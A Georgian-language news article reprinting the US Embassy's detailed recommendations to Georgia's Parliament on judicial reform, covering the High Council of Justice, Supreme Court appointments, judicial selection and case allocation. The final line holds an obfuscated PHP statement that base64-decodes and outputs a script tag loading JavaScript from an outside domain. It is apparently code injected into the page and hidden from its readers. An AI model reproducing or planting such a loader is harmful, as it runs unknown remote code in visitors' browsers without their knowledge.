celsiusi
ავერსი საქკაბელი
აშშ-ს საელჩო საქართველოს პარლამენტს სასამართლო რეფორმასთან დაკავშირებით რეკომენდაციებით მიმართავს, სააგენტო BUSINESS TIME ტექსტსს უცვლელად გთავაზობთ. 
 
„ამერიკის შეერთებული შტატების საელჩო თბილისში ქვემოთ მოცემულ რეკომენდაციებს წარუდგენს პარლამენტს, სასამართლოს, სამოქალაქო საზოგადოებას და მართლმსაჯულების სისტემის სხვა დაინტერესებულ მონაწილეებს. რეკომენდაციები ეყრდნობა საელჩოს კომუნიკაციას პარლამენტთან და სხვა საკვანძო მხარეებთან. რეკომენდაციები, ასევე ითვალისწინებს ვენეციის კომისიის, ეუთოს, ევროპის მოსამართლეთა საკონსულტაციო საბჭოს (CCJE) და სხვა საერთაშორისო ორგანიზაციების მოსაზრებებს.
 
ეს რეკომენდაციები დეტალურია, თუმცა არა ყოვლისმომცველი. ჩვენ ვაცნობიერებთ, რომ არის სხვა საკითხებიც, რომლებიც შემდგომ დახვეწას საჭიროებს. იმედი გვაქვს, რომ ეს რეკომენდაციები ხელს შეუწყობს პარლამენტს და მართლმსაჯულების სისტემის სხვა მონაწილეებს, ნაბიჯები გადადგან კონსესუნსისკენ. ასევე, იმედი გვაქვს, რომ რეკომენდაციები დაეხმარება პარლამენტს საკანონმდებლო ცვლილებების შემუშავების პროცესში, რომელთა მეშვეობითაც გაუმჯობესდება სასამართლო სისტემის გამჭვირვალობა, ეფექტიანობა და ანგარიშვალდებულება, ასევე, გაიზრდება საზოგადოების ნდობა ამ ინსტიტუტის მიმართ. ამერიკის შეერთებული შტატები მზად არის, მხარი დაუჭიროს პარლამენტისა და ქართველი ხალხის ძალისხმევას, შექმნას ძლიერი, უფრო დამოუკიდებელი სასამართლო.
 
ზოგადი რეკომენდაციები
 
სასამართლო რეფორმის საერთაშორისო შეფასება: შეფასება უნდა განხორციელდეს საერთაშორისო ექსპერტების დახმარებით, ინკლუზიური და წარმომადგენლობითი პროცესის შედეგად და დემოკრატიის სამიტზე საქართველოს მიერ გაცხადებული ვალდებულებების შესაბამისად. მომავალში განსახორციელებელ რეფორმებზე რეკომენდაციების შემუშავების მიზნით, შეფასებამ უნდა მოიცვას არა მხოლოდ საკანონმდებლო ხარვეზები, არამედ, ასევე, უნდა შეისწავლოს სასამართლო რეფორმის წინა ტალღების განხორციელების ხარისხი და მისი გავლენა მართლმსაჯულების სისტემაზე. პარლამენტმა უნდა განიხილოს შეფასების პროცესში ეუთოს/დემოკრატიული ინსტიტუტებისა და ადამიანის უფლებების ოფისის (ODIHR), ან ვენეციის კომისიის ჩართვის შესაძლებლობა. პარლამენტმა უნდა განიხილოს სამუშაო ჯგუფის გაფართოების შესაძლებლობა და ჯგუფის მუშაობაში უნდა ჩართოს სასამართლო ხელისუფლება, სამოქალაქო საზოგადოება, საქართველოს სახალხო დამცველი, საქართველოს ადვოკატთა ასოციაცია, მართლმსაჯულების საკითხებზე მომუშავე სხვა სუბიექტები, სამართლის ექსპერტები და საერთაშორისო საზოგადოება. ყველა დაინტერესებულ პირს უნდა მიეცეს შესაძლებლობა, ჯგუფის წევრებს გაუზიაროს საკუთარი ხედვა, მონაწილეობა მიიღოს დისკუსიაში და წარმოადგინოს რეფორმასთან დაკავშირებული წინადადებები.
 
დემოკრატიის სამიტზე საქართველოს მიერ აღებული ვალდებულებების სრულად შესრულება: უნდა გაუმჯობესდეს პირველი და მეორე ინსტანციის მოსამართლეთა დამსახურების მიხედვით შერჩევისა და დანიშვნის წესები და ამ პროცესის გამჭვირვალობა.
 
მიღებულ უნდა იქნას საკანონმდებლო ცვლილებები, რომელიც უზრუნველყოფს საქართველოს საკონსტიტუციო სასამართლოს 2019 წლის ივნისის გადაწყვეტილების შესრულებას და დაადგენს სასამართლოს გადაწყვეტილებათა გამოქვეყნების წესს. სასამართლოს გადაწყვეტილებათა გამოქვეყნება: სასამართლოს ყველა გადაწყვეტილება უნდა გამოქვეყნდეს და ხელმისაწვდომი იყოს საზოგადოებისთვის განსახილველად, გარდა ისეთი გამონაკლისი შემთხვევებისა, როცა გადაწყვეტილების გამოუქვეყნებლობა გამართლებულია მსხვერპლის დაცვის, ან მიმდინარე გამოძიების ინტერესით. რამდენადაც შესაძლებელია, გადაწყვეტილებები სენსიტიური საქმეების შემთხვევაშიც უნდა გამოქვეყნდეს დაშტრიხული სახით, ან გამოძიების ეტაპის დასრულების შემდგომ.
 
გენდერული თანასწორობა: საქართველოში მოსამართლეთა 50%-ზე მეტს ქალები წარმოადგენენ. შესაბამისად, სასამართლო სისტემაში გენდერული ბალანსი დაცულია. თუმცა, ქალ მოსამართლეთა მიერ დაკავებული ადმინისტრაციული/საკვანძო თანამდებობების რაოდენობა არ ასახავს არსებულ გენდერულ ბალანსს. რეკომენდაციას ვუწევთ გარკვეული გარანტიების შემოღებას, რათა სასამართლო სისტემის საკვანძო პოზიციებზე და მოსამართლეთა დანიშვნებისას „ორივე სქესის დაბალანსებული წარმომადგენლობის“ უზრუნველყოფა მოხდეს. პარლამენტმა და იუსტიციის უმაღლესმა საბჭომ უნდა უზრუნველყონ გენდერული ბალანსი სასამართლო სისტემაში და, განსაკუთრებით, ხელმძღვანელ პოზიციებზე მოსამართლეთა დანიშვნისას, თუმცა, იმავდროულად, არ უნდა მოხდეს ძირითადი შერჩევის კრიტერიუმების იგნორირება.
 
ნაფიც მსაჯულთა გამოყენების საფუძვლების გაფართოება: რეკომენდაციას ვუწევთ ნაფიც მსაჯულთა ინსტიტუტის გაფართოებას, რათა შესაძლებელი გახდეს მსაჯულთა გამოყენება მაღალი საზოგადოებრივი ინტერესის მქონე სისხლისა და სამოქალაქო სამართლის საქმეებზე, როგორიცაა, მაგალითად, კორუფციული დანაშაული, თანამდებობის ბოროტად გამოყენება, ასევე მაღალი სარჩელის ფასის მქონე სამოქალაქო/ქონებრივი დავები. ამგვარი ცვლილება მხარეს მისცემს შესაძლებლობას, აირჩიოს ნაფიც მსაჯულთა სასამართლო თავისი სამართლებრივი პრობლემის გადაჭრის გზად და, ასევე, გაზრდის საზოგადოების ნდობას მნიშვნელოვან საქმეებზე შედეგების მიმართ.
 
მოსამართლეთა შერჩევისა და დანიშვნის პროცესის გამჭვირვალობის გაზრდა. მკაცრად უნდა შეფასდეს, თუ რამდენად აკმაყოფილებს თითოეული კანდიდატი დადგენილ საკვალიფიკაციო მოთხოვნებს, როგორიცაა, მაგალითად, იურიდიული განათლება. რეკომენდაციას ვუწევთ წარსული საქმიანობისა და კეთილსინდისიერების შემოწმების პროცედურის შემუშავებას/დახვეწას, რომლის დროსაც მოხდება ინფორმაციის ყველა შესაძლო წყაროს გათვალისწინება და შეფასების შედეგის გამოქვეყნება. გამჭვირვალობის უზრუნველსაყოფად აუცილებელია, შეფასების შედეგები გამოქვეყნდეს დროულად, რათა საზოგადოებას მიეცეს შესაძლებლობა, იმსჯელოს კანდიდატის შესახებ.
 
იუსტიციის უმაღლესი საბჭო
 
იუსტიციის უმაღლესი საბჭოს არამოსამართლე წევრის დანიშვნა - პარლამენტი/პრეზიდენტი: პარლამენტმა უნდა შეასრულოს თავისი ვალდებულება და დანიშნოს იუსტიციის უმაღლესი საბჭოს არამოსამართლე წევრები საქართველოს კანონმდებლობისა და საერთაშორისო საუკეთესო პრაქტიკის შესაბამისად. პარლამენტმა უნდა უზრუნველყოს იუსტიციის უმაღლესი საბჭოს წევრთა გამჭვირვალე შერჩევა, სადაც ოპოზიციური პარტიების, იურიდიული პროფესიისა და სამოქალაქო საზოგადოების წარმომადგენლებს ექნებათ კანდიდატთან გასაუბრების პროცესში მონაწილეობის შესაძლებლობა. პარლამენტმა, ამ მნიშვნელოვანი ვაკანსიის შევსებისას, უნდა მოიაზროს მხოლოდ უმაღლესი კვალიფიკაციის, აპოლიტიკური კანდიდატები და იუსტიციის უმაღლესი საბჭოს არამოსამართლე წევრები ფართო პარტიათაშორისი მხარდაჭერით დანიშნოს კანონმა, ასევე, უნდა გაითვალისწინოსპრეზიდენტის მიერ იუსტიციის უმაღლესი საბჭოს წევრის დანიშვნის პროცესი და შესაბამისობაში მოიყვანოს იგი წევრთა დანიშვნების რეკომენდებულ საპარლამენტო პროცესთან.
 
იუსტიციის უმაღლესი საბჭოს შემადგენლობა: კენჭისყრის და საბჭოს მიერ გადაწყვეტილების მიღების პროცესზე მოსამართლე წევრთა სრული კონტროლის გათვალისწინებით, იუსტიციის უმაღლესი საბჭოს დაკომპლექტება მწვავე დისკუსიის საგანია. საკითხს ამწვავებს ისიც, რომ პარლამენტმა ამ დრომდე ვერ შეძლო არამოსამართლე წევრთა ვაკანტური პოზიციების შევსება. იმისათვის, რომ გაძლიერდეს საბჭოში არამოსამართლე წევრთა ხმა და შეიქმნას გადაწყვეტილების მიღების პროცესში მათი რეალური მონაწილეობის შესაძლებლობა, რეკომენდაციას ვუწევთ იუსტიციის უმაღლეს საბჭოში მოსამართლე და არამოსამართლე წევრებს შორის თანაფარდობის გადასინჯვას. ასევე, რეკომენდაციას ვუწევთ იუსტიციის უმაღლესი საბჭოს წევრთა ეტაპობრივ დანიშვნას, რათა არ მოხდეს საბჭოს სრული შემადგენლობის ერთდროული განახლება. ასევე, საბჭოს წევრის უფლებამოსილების ვადა უნდა შეწყდეს მხოლოდ მას შემდეგ, რაც კანონით დადგენილი წესით აირჩევა/დაინიშნება მისი შემცვლელი . საუკეთესო გადაწყვეტა იქნებოდა ისეთი სისტემის ჩამოყალიბება, სადაც, ყოველ ჯერზე, იუსტიციის უმაღლესი საბჭო წევრთა მხოლოდ ერთი მესამედით განახლდება.
 
იუსტიციის უმაღლესი საბჭოს წევრთა უფლებამოსილების ვადა: საერთო სასამართლოების შესახებ ორგანული კანონით გათვალისწინებული დანაწესი 2021 წლის დეკემბრამდე არსებულ რედაქციას უნდა დაუბრუნდეს და გაითვალისწინოს საბჭოს წევრთა ზედიზედ ორჯერ არჩევის შესაძლებლობის აკრძალვა. აღნიშნული ცვლილება გაზრდის იუსტიციის უმაღლესი საბჭოს დამოუკიდებლობას.
 
იუსტიციის უმაღლესი საბჭოს წევრთა არჩევა - მოსამართლეთა კონფერენცია: კანონმდებლობით უნდა შეიცვალოს იუსტიციის უმაღლესი საბჭოს მოსამართლე წევრთა არჩევის არსებული პროცედურა. ყველა კანდიდატი ვალდებული უნდა იყოს, წინასწარ დარეგისტრირდეს და წარადგინოს თავისი ხედვა, რათა მოსამართლეთა კონფერენციის მონაწილეებს შესაძლებლობა ჰქონდეთ კენჭისყრამდე შეაფასონ კანდიდატის თანამდებობასთან შესაბამისობა. თითოეულ კანდიდატს უნდა ჰქონდეს შესაძლებლობა, მიმართოს მოსამართლეთა კონფერენციას. ასევე, კონფერენციის მონაწილე თითოეულმა მოსამართლემ ხმა უნდა მისცეს მხოლოდ ერთ კანდიდატს, შესავსები ვაკანსიების რაოდენობის მიუხედავად. იუსტიციის უმაღლესი საბჭოს წევრის ვაკანსია უნდა შეივსოს იმ კანდიდატებით, რომლებიც დააგროვებენ ხმათა მეტ რაოდენობას. კანონის არსებული მოთხოვნა, რომლის მიხედვითაც მოსამართლეთა კონფერენციის მიერ იუსტიციის უმაღლესი საბჭოს წევრის არჩევისათვის აუცილებელია კონფერენციაზე დამსწრე წევრთა მინიმუმ 2/3-ის მხარდაჭერა, უნდა გაუქმდეს. მას შემდეგ, რაც ყველა ვაკანტური ადგილი შეივსება, დარჩენილი კანდიდატებისგან, მათ მიერ დაგროვილი ხმების კლებადობის მიხედვით, უნდა შედგეს სარეზერვო სია. იუსტიციის უმაღლესი საბჭოს მოსამართლე წევრის ვაკანსიის გაჩენის შემთხვევაში, ვაკანსია უნდა შეივსოს ამ სარეზერვო სიაში მყოფი შემდგომი კანდიდატით, იუსტიციის უმაღლეს საბჭოში წევრის ოთხწლიანი უფლებამოსილების დარჩენილი ვადით.
 
სასამართლოს ხელმძღვანელ პირთა წევრობა იუსტიციის უმაღლეს საბჭოში: იმისათვის, რათა თავიდან იქნას აცილებული ძალაუფლების კონცენტრაცია მოსამართლეთა მცირე ჯგუფის ხელში და შემცირდეს რამდენიმე ადმინისტრაციულ და ხელმძღვანელ პოზიციაზე მყოფ მოსამართლეთა ზეგავლენა სასამართლო სისტემაზე, კანონში უნდა შევიდეს ცვლილება და სასამრთლოს თავმჯდომარეს, თავმჯდომარის მოადგილეს, კოლეგიისა და პალატის თავმჯდომარეს შეეზღუდოს იუსტიციის უმაღლეს საბჭოში არჩევის შესაძლებლობა.
 
მოსამართლეთა დისციპლინური პასუხისმგებლობა: მოსამართლეთა დანიშვნის პროცესისთვის რეკომენდებული ორმაგი 2/3-ის მხარდაჭერის მოდელის მსგავსად,მოსამართლეთა დისციპლინურ პასუხისმგებლობასთან დაკავშირებული გადაწყვეტილების მიღებისათვის, ასევე, სავალდებულო უნდა იყოს იუსტიციის უმაღლესი საბჭოს მოსამართლე წევრთა 2/3-ისა და არამოსამართლე წევრთა 2/3-ის მხარდაჭერა. ეს მოდელი შეამცირებს სისტემის ბოროტად გამოყენების რისკებს და ბრალდებებს იმასთან დაკავშირებით, რომ დისციპლინური პასუხისმგებლობა, შესაძლოა, გამოყენებულ იქნას მოსამართლეთა მიერ გადაწყვეტილების მიღების პროცესზე ზეგავლენის მოხდენის საშუალებად. უნდა მოხდეს საერთო სასამართლოების შესახებ ორგანულ კანონში მოსამართლეთა დისციპლუნური პასუხისმგებლობის შესახებ 2021 წლის დეკემბერში მიღებული ცვლილებების გადახედვა იმ რისკების გამო, რომელსაც აღნიშნული ცვლილებები ქმნის, კერძოდ: მოსამართლის დისციპლინური პასუხისმგებლობის შესაძლებლობა “პოლიტიკური ნეიტრალიტეტის” პრინციპის საფუძველზე, ვინაიდან აღნიშნული სტანდარტის ბუნდოვანმა განმარტებამ შესაძლოა გამოიწვიოს მისი არაკეთილსინდისიერი და ბოროტად გამოყენება; და დისციპლინური საქმის წარმოების დასრულებამდე მოსამართლისთვის უფლებამოსილების შეჩერების შესაძლებლობა, რადგან ამ ღონისძიებას არ აქვს საკმარისი გარანტიები.
 
იუსტიციის უმაღლესი საბჭოს სხდომების გამჭვირვალობა: გამჭვირვალობის ზრდა გაზრდის საზოგადოების ნდობას იუსტიციის უმაღლესი საბჭოს მიმართ. კანონში უნდა შევიდეს ცვლილებები, რათა განისაზღვროს იუსტიციის უმაღლესი საბჭოს სხდომების „ღიაობა“ და „საჯაროობა“. ჩვენი რეკომენდაციაა, რომ საბჭოს ყველა სხდომა გახდეს ღია საზოგადოებისათვის სხდომის პირდაპირი ტრანსლაციისა და, ასევე, სხდომების აუდიო/ვიდეო ჩანაწერების საბჭოს ვებგვერდზე განთავსების გზით. გარდა ამისა, ჩვენ მოვუწოდებთ იუსტიციის უმაღლეს საბჭოს მოქმედი წესების აღსრულებისკენ, რაც გულისხმობს, მათ შორის, საბჭოს ვებგვერდზე საბჭოს შეხვედრების დღის წესრიგის გამოქვეყნებას შეხვედრების ჩატარებამდე სულ მცირე სამი დღით ადრე, რომლის დაცვაც ამჟამად არ ხდება.
 
მოსამართლეთა სპეციალიზაცია: სპეციალიზაცია და ვიწრო სპეციალიზაცია ყველა სასამართლოსთვის უნდა განისაზღვროს საერთო სასამართლოების შესახებ ორგანულ კანონში. მოსამართლისათვის (გარდა უზენაესი სასამართლოს მოსამართლისა) კონკრეტული სპეციალიზაციის, ან ვიწრო სპეციალიზაციის განსაზღვრის უფლებამოსილება უნდა ჰქონდეს იუსტიციის უმაღლეს საბჭოს. ასეთი გადაწყვეტილებები უნდა ეფუძნებოდეს მოსამართლის კვალიფიკაციის ობიექტურ შეფასებას და გადაწყდეს მოსამართლის თანხმობის საფუძველზე.
 
უზენაესი სასამართლო
 
კონკრეტული ვადით დანიშნული მოქმედი უზენაესი სასამართლოს მოსამართლეების უვადოდ არჩევა: უზენაეს სასამართლოში კვალიფიციური და გამოცდილი მოსამართლეების შენარჩუნების მიზნით, რეკომენდებულია კონკრეტული ვადით დანიშნული მოქმედი მოსამართლეების უვადოდ არჩევა.
 
უზენაესი სასამართლოს მოსამართლის თანამდებობაზე კანდიდატთა წარდგენა და არჩევა: მიუხედავად იმისა, რომ პარლამენტმა უახლოეს წარსულში მიიღო საკანონმდებლო ცვლილებები, რომელიც ითვალისწინებს ღია კენჭისყრას საბჭოში, გადაწყვეტილებების დასაბუთებასა და ქულებით საუკეთესო შედეგების მქონე კანდიდატების გამოვლენას, ჯერ კიდევ არსებობს საკითხები, რომლებიც საჭიროებს რეფორმირებას. პარლამენტმა უნდა იმუშაოს პოლიტიკურ პარტიებთან, სამოქალაქო საზოგადოებასთან, მოსამართლეებთან, ექსპერტებთან და, ინკლუზიური პროცესის მეშვეობით, შეიმუშაოს სრულყოფილი სასამართლო რეფორმა, რომელიც მოიცავს ვენეციის კომისიის რეკომენდაციებს უზენაესი სასამართლოს მოსამართლეობის კანდიდატების წარდგენასა და პარლამენტის მიერ არჩევასთან დაკავშირებით. კანონმდებლობამ უნდა გაითვალისწინოს იუსტიციის უმაღლესი საბჭოს მიერ კანდიდატის წარდგენა საბჭოს მოსამართლე წევრების 2/3-ის და არამოსამართლე წევრების 2/3-ის თანხმობით. გარდა ამისა, კანონმდებლობამ უნდა გაზარდოს პარლამენტის მიერ უზენაესი სასამართლოს მოსამართლის არჩევისთვის საჭირო ხმების მინიმალური რაოდენობა, ამჟამინდელი უბრალო უმრავლესობიდან (76 ხმა) 90 ხმამდე, იგივე, რაც საჭიროა იუსტიციის უმაღლეს საბჭოში არამოსამართლე წევრის დანიშვნისთვის.
 
საჭირო გამოცდილების/ასაკის გაზრდა: უნდა გაიზარდოს საჭირო ასაკი და გამოცდილება უზენაესი სასამართლოს მოსამართლეებისთვის, რათა უზრუნველყოფილ იქნას კანდიდატების კვალიფიციურობა. ამასთან, იმ კანდიდატებს, რომლებიც განიხილებიან უმაღლესი ინსტანციის სასამართლოსთვის, უნდა მოეთხოვებოდეთ ადამიანის უფლებების სფეროში მუშაობის გამოცდილება.
 
ეფექტიანი გასაჩივრება: ეფექტიანი გასაჩივრების უფლების უზრუნველსაყოფად, განხილულ უნდა იქნას იუსტიციის უმაღლესი საბჭოს შემადგენლობის შეცვლა შემდგომი გადაწყვეტილების მიღებისას იმ წევრების გამორიცხვით, რომელთა მიმართაც უზენაესი სასამართლოს საკვალიფიკაციო პალატის მიერ დადგინდა მიკერძოებულობა, ან სხვა დარღვევა, რომელიც გათვალისწინებულია საერთო სასამართლოების შესახებ საქართველოს ორგანული კანონით. ასევე, მნიშვნელოვანია დანიშვნის პროცედურის შეჩერება, უზენაესი სასამართლოს საკვალიფიკაციო პალატის მიერ გასაჩივრებასთან დაკავშირებით გადაწყვეტილების გამოტანამდე.
 
საკონსტიტუციო სასამართლოში დანიშვნები: უნდა მოხდეს პარლამენტის, პრეზიდენტისა და სასამართლოს მიერ საკონსტიტუციო სასამართლოს მოსამართლეების დანიშვნის პროცესის სტანდარტიზება. ჩვენ რეკომენდაციას ვუწევთ, განხორციელდეს ცვლილებები შესაბამის კანონებში და პარლამენტის რეგლამენტში, რათა კანდიდატების შერჩევა მოხდეს პროფესიული დამსახურების საფუძველზე, ღია და გამჭვირვალე პროცესით, სხვა სასამართლო დანიშვნების პროცესში შეთავაზებული გაუმჯობესების მსგავსად.
 
მოსამართლეთა დანიშვნები: კანონში უნდა შევიდეს ცვლილებები, რათა უზრუნველყოფილ იქნას ღია კენჭისყრა, დანიშვნების დასაბუთება და დანიშვნისთვის საჭირო ხმების გაზრდა. ამჟამინდელი გადაწყვეტილებები ფორმალისტურია, არ არის ინდივიდუალიზებული და არ მისდევს საერთო სასამართლოების შესახებ კანონში მითითებულ სამართლებრივ ჩარჩოს, სადაც ჩამოთვლილია კომპეტენტურობისა და კეთილსინდისიერების კრიტერიუმები, როგორც შეფასების ძირითადი კომპონენტები. გარდა ამისა, ახლანდელ დასაბუთებებში არ არის მოცემული კანდიდატის უარყოფის მიზეზები. ჩვენ, ასევე, გირჩევთ, რომ იუსტიციის უმაღლესი საბჭოს მიერ მოსამართლეების დანიშვნები განხორციელდეს საბჭოს მოსამართლე წევრების 2/3-ისა და საბჭოს არამოსამართლე წევრების 2/3-ის ხმების საფუძველზე. ასევე, კანონმა უნდა გაითვალისწინოს სამოსამართლეო უნარების შესახებ მოკლე ადაპტირებული კურსის შექმნა იმ გამოცდილი იურისტებისთვის, რომელთაც აქვთ სასამართლოში წარმომადგენლობის არანაკლებ ათი, ან მეტი წლის გამოცდილება. აღნიშნული კურსი თავსებადი უნდა იყოს სამსახურთან. იმ პროფესიონალებს, რომლებიც წარმატებით დაასრულებენ კურსს, უნდა მიეცეთ უფლება, მონაწილეობა მიიღონ მოსამართლის ვაკანტურ პოზიციაზე გამოცხადებულ კონკურსში, რათა გაიზარდოს კვალიფიციური კანდიდატების რაოდენობა. კანონმა უნდა დაავალოს იუსტიციის უმაღლეს სკოლას, შეიმუშაოს გადამზადების მოკლე კურსი იმ ყოფილი მოსამართლეებისთვის, რომელთაც აქვთ საკმარისი გამოცდილება, მაგრამ მინიმუმ ბოლო ხუთი წლის მანძილზე არ უმუშავიათ მოსამართლედ. ყოფილ მოსამართლეებს, რომლებიც ამ კურსს გაივლიან, არ უნდა მოეთხოვოთ დამატებით საწყისი ტრენინგის გავლა.
 
სასამართლოს თავმჯდომარეების დანიშვნა და ფუნქციები: საჭიროა საკანონმდებლო ცვლილებები, რათა თითოეული სასამართლოს თავმჯდომარის არჩევა მოხდეს უშუალოდ ამ სასამართლოს მოსამართლეების მიერ, ან როტაციის წესით, შეზღუდული, მაგრამ განახლებადი ვადით. მსხვილ სასამართლოებში, თავმჯდომარის არჩევა უნდა მოხდეს აღნიშნული სასამართლოს მოსამართლეების მიერ იმავე პროცედურით, რაც შემოთავაზებულია იუსტიციის უმაღლესი საბჭოს მოსამართლე წევრების არჩევისთვის.17 მცირე ზომის სასამართლოებში, სადაც არის რისკი, რომ კენჭისყრა ვერ იქნება ფარული, რეკომენდებულია როტაციის სისტემის შემოღება. საკანონმდებლო ცვლილებებმა, ასევე, უნდა მოახდინოს თავმჯდომარისა და სასამართლო მენეჯერის ფუნქციებისა და უფლებამოსილების დეცენტრალიზება. მენეჯერული ფუნქციები, როგორიცაა ბიუჯეტის დაგეგმვა, სასამართლო აპარატის თანამშრომელთა სამსახურში დანიშვნა და გათავისუფლება, უნდა იყოს დეცენტრალიზებული იმგვარად, რომ აღნიშული გადაწყვეტილებების მიღება არ მოხდეს ერთპიროვნულად. როცა სასამართლოს თავმჯდომარე აპირებ სასამართლოს ორგანიზაციულ საკითხებში მნიშვნელოვანი ცვლილების შეტანას, მან უნდა გაიაროს კონსულტაცია ამავე სასამართლოს მოსამართლეებთან. დამატებით, ისეთი თანამდებობრივი პრივილეგიები, რომლებიც უკავშირდება თავმჯდომარის პოზიციას, როგორიცაა სამსახურებრივი მანქანა, მძღოლი, სახელფასო დანამატი და ბონუსები, უნდა გაუქმდეს. უფრო მეტიც, საქმეების განხილვა უნდა იყოს სასამართლოს თავმჯდომარეების უპირველესი მოვალეობა, მათი სამოსამართლო კომპეტენციისა და მომზადების გამო.
 
ასევე, გასათვალისწინებელია საკანონმდებლო ცვლილებებით სასამართლოს თავმჯდომარის მოადგილის, კოლეგიის და პალატის თავმჯდომარის პოზიციების გაუქმების საკითხი, როგორც სასამართლო სისტემისთვის არააუცილებელი პოზიციებისა.
 
მოსამართლის დაწინაურება და სხვა სასამართლოში გადაყვანა: საკანონმდებლო ცვლილებების გზით, უნდა შემუშავდეს მოსამართლეთა დაწინაურების ყოვლისმომცველი სისტემა, რომლის საფუძველზეც დაწინაურება და სხვა სასამართლოში გადაყვანა დაფუძნებული იქნება დამსახურებაზე, ობიექტურ შეფასებაზე და მოხდება მხოლოდ კონკურენტული პროცესის შედეგად. ასევე, მოსამართლის გადაყვანასთან დაკავშირებული გადაწყვეტილებები უნდა იყოს დასაბუთებული, დროში ლიმიტირებული და ექვემდებარებოდეს გასაჩივრებას. უნდა გაუქმდეს საერთო სასამართლოების შესახებ კანონში 2021 წლის დეკემბერში განხორციელებული ცვლილებები, რამელმაც შესაძლებელი გახადა მოსამართლის გადაყვანა მისი თანხმობის გარეშე და გაახანგრძლივა გადაყვანის ვადა.
 
საქმეთა შეთხვევითი განაწილება: საჭიროა საკანონმდებლო ცვლილებ, რათა კანონში ამომწურავად მოხდეს იმ საგამონაკლისო შემთხვევების ასახვა, როდესაც საქმეთა ელექტრონული განაწილება შემთხვევითი პრინციპით ვერ განხორციელდება. ეს შეამცირებს საქმეთა განაწილების პროცესში ჩარევის რისკს. უნდა გამოქვეყნდეს და ახსნილ იქნას ყველა ის შემთხვევა, როცა საქმე არ განაწილდება შემთხვევითი პრინციპით.
 
იუსტიციის უმაღლესი სკოლის მმართველობის სტრუქტურა: საჭიროა საკანონმდებლო ცვლილებები, რათა შემცირდეს იუსტიციის უმაღლესი საბჭოს გავლენა იუსტიციის უმაღლესი სკოლის დამოუკიდებელი საბჭოს წევრების არჩევის პროცესზე.
478
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");